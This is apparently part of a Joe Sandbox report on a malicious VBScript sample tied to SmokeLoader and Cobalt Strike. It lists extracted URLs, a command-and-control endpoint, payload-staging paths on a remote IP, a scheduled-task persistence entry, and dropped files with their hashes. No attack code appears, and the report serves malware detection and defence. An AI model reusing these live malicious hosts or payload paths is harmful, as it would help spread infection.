                                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                        		high
                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://powerpoint.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.foreca.comexplorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.ecosia.org/newtab/explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                                		high
                                                                                                https://outlook.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://prolinice.ga/Oexplorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                                      		high
                                                                                                      https://res.cloudinary.compowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgXpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                                                                            		high
                                                                                                            https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgpowershell.exe, 00000002.00000002.1453088771.0000014788B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000000.1506729663.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000C.00000000.1506729663.0000000008F83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://api.msn.com/explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 0000000E.00000002.1757266577.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1730709154.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.1746568361.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2525393447.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.1941068248.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2524671592.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2524396685.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2524911167.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2524250168.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                                                                          		high
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.msn.com:443/en-us/feedexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                46.173.214.14
                                                                                                                                		prolinice.gaRussian Federation
                                                                                                                                		47196GARANT-PARK-INTERNETRUtrue
                                                                                                                                192.3.27.144
                                                                                                                                		unknownUnited States
                                                                                                                                		36352AS-COLOCROSSINGUSfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1586466
                                                                                                                                Start date and time:2025-01-09 08:01:06 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 6m 55s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:30
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:1
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:sweetnessgoodforgreatnessthingswithgood.tIF.vbs
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.bank.troj.spyw.expl.evad.winVBS@27/21@2/2
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 90.9%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 97%
                                                                                                                                • Number of executed functions: 117
                                                                                                                                • Number of non-executed functions: 86
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .vbs

                                                                                                                                Warnings

                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.17.201.1, 104.17.202.1, 20.189.173.21, 13.107.246.45, 20.109.210.53, 20.190.160.20
                                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target uahuajd, PID 1652 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                02:01:58API Interceptor47x Sleep call for process: powershell.exe modified
                                                                                                                                03:21:30API Interceptor141366x Sleep call for process: explorer.exe modified
                                                                                                                                03:22:11API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                09:21:48Task SchedulerRun new task: Firefox Default Browser Agent 0757462E3259C930 path: C:\Users\user\AppData\Roaming\uahuajd

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                46.173.214.14begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • prolinice.ga/index.php
                                                                                                                                192.3.27.144begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • 192.3.27.144/250/evenmegoodfor.txt
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                prolinice.gabegoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.14
                                                                                                                                bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.24
                                                                                                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.24
                                                                                                                                veryeasythingsevermadeforcreatenewthignsbetterthigns.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • 45.91.8.152
                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 185.251.91.119
                                                                                                                                40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 185.251.91.119
                                                                                                                                #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 77.232.129.190
                                                                                                                                171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 77.232.129.190
                                                                                                                                #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                • 77.232.129.190

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                GARANT-PARK-INTERNETRUbegoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.14
                                                                                                                                Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                • 46.173.214.195
                                                                                                                                bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.24
                                                                                                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                • 46.173.214.24
                                                                                                                                0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                • 46.173.214.92
                                                                                                                                0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                • 46.173.214.92
                                                                                                                                9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                • 46.173.214.92
                                                                                                                                9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                • 46.173.214.92
                                                                                                                                bacon.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                • 46.173.214.102
                                                                                                                                UfRKIdsNvD.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                • 46.173.214.92
                                                                                                                                AS-COLOCROSSINGUSbegoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                • 192.3.27.144
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144
                                                                                                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.3.27.144
                                                                                                                                miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 192.210.142.114
                                                                                                                                9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                                • 172.245.123.11
                                                                                                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.168.33.8
                                                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.168.33.8
                                                                                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.168.33.8
                                                                                                                                sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 107.175.130.16

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                C:\Users\user\AppData\Roaming\uahuajdbegoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                  bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                                                    kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                        invoice727282_PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                                            6038732).vbsGet hashmaliciousLokibotBrowse
                                                                                                                                              cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                                                SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_96a341e8-2d92-4ab9-b28a-0ab8db548546\Report.wer

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65536
                                                                                                                                                    Entropy (8bit):0.9435287208969765
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:rQJMeeCoQ0LZTkrjyaVwzuiFcWZ24lO8k:ZXCorLZTWjKzuiFcWY4lO8k
                                                                                                                                                    MD5:C34D80AD5BA66F9384B6596979FCCBE6
                                                                                                                                                    SHA1:04CC776CE42171B325B96E9C1A5B455BBAD7B78E
                                                                                                                                                    SHA-256:96CE60921526647D55302507C709DD5C1C54D8C217F4DBC3AFD2ADC47A05C193
                                                                                                                                                    SHA-512:8C733F51A6ED076A26435D435014CD0F845198A89595037904ED41F3A76B4679286D495FA5D7FC959EBA72325D632505F3943F1426B059E359E8C4F500C5D10F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.4.5.1.5.2.0.7.8.9.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.4.5.1.5.6.2.9.7.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.a.3.4.1.e.8.-.2.d.9.2.-.4.a.b.9.-.b.2.8.a.-.0.a.b.8.d.b.5.4.8.5.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.3.d.1.a.b.0.-.8.3.7.9.-.4.1.9.9.-.a.7.1.6.-.0.4.8.0.1.f.c.1.d.c.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.c.-.0.0.0.1.-.0.0.1.4.-.a.1.a.0.-.f.5.8.9.6.f.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.

                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1669.tmp.dmp

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Jan 9 08:21:55 2025, 0x1205a4 type
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):57702
                                                                                                                                                    Entropy (8bit):1.5744878635183455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:OqxBAwK5r1L6MHO2pxdsNb+/Y0lD9pnT2rCt5V:XxBlK3nuubsh+/Y0lD9pnawP
                                                                                                                                                    MD5:7E125FB193F6A49EA4D0F17EBDDA3301
                                                                                                                                                    SHA1:2293A2320773899708DFAD4EC6F2E76D17B12C67
                                                                                                                                                    SHA-256:AAC9F5AF36A9865EEBD0178393CD3A6FD4F76C9D13AA5CDAA1ABC4BB89A0EB1B
                                                                                                                                                    SHA-512:331CF3F73BF71E6D0165A63CF24BCFB74D4F225D7BC9FB331524DB2B16228FD48E587BB27392E2D9CFEB955923258E4846FCC24310B64DF98D352AC7DEE3CC6A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:MDMP..a..... .......#..g.........................................7..........T.......8...........T...........0...6...........L...........8...............................................................................eJ..............Lw......................T...........!..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1716.tmp.WERInternalMetadata.xml

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8558
                                                                                                                                                    Entropy (8bit):3.6959134539963148
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:R6l7wVeJdg1DX6YNIvQgmfqtjbhpD789bUN+fPcm:R6lXJ6B6YS4gmfqtjkU0fh
                                                                                                                                                    MD5:744009C78878BDCDB1DAA12F32A3E6E9
                                                                                                                                                    SHA1:DFC4D6EDCA91E9006C7D2EE2758D185A6A1D1C74
                                                                                                                                                    SHA-256:3B8400BD3CD824CECD1CE45311CBD2190843FF81B3FEB8E8B30EBFBE43BC1A28
                                                                                                                                                    SHA-512:E8F7F0AFF6AB0EEF0C370159164528DD4F3C13F7962CE7AE893857179CBA910C88DF2B24EE7C9439F195516217123F684C4267AB4146B7F8702A664A84F36866
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.0.8.<./.P.i.

                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1746.tmp.xml

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4719
                                                                                                                                                    Entropy (8bit):4.45160811453856
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cvIwWl8zsfJg771I9epWpW8VYRYm8M4JYcFdddyq85MN0b9Q36d:uIjfBI7JY7VxJl7Z0ba36d
                                                                                                                                                    MD5:39A11503642FA19446B620E6B4C7FB18
                                                                                                                                                    SHA1:CF214BCF9ECADE43F15D3763419EE2B004A93AAC
                                                                                                                                                    SHA-256:C3178E7E4B6F78ADD5ECB73F448F8145D61AF481D3BA2F280B4FD56778BD5C80
                                                                                                                                                    SHA-512:13F8B4D9CAE6E54BC8A4AF4DF30A7E6BB2BE9BB71E8265B8BF4C388A3D387B52E5752A8656FEAC9796363C5A5E3F3145DF5CC945A7337561AC977B88C91D4CD6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uahuajd.log

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):311
                                                                                                                                                    Entropy (8bit):5.347482639021185
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                                                    MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                                                    SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                                                    SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                                                    SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9434
                                                                                                                                                    Entropy (8bit):4.928515784730612
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                    MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                    Malicious:false
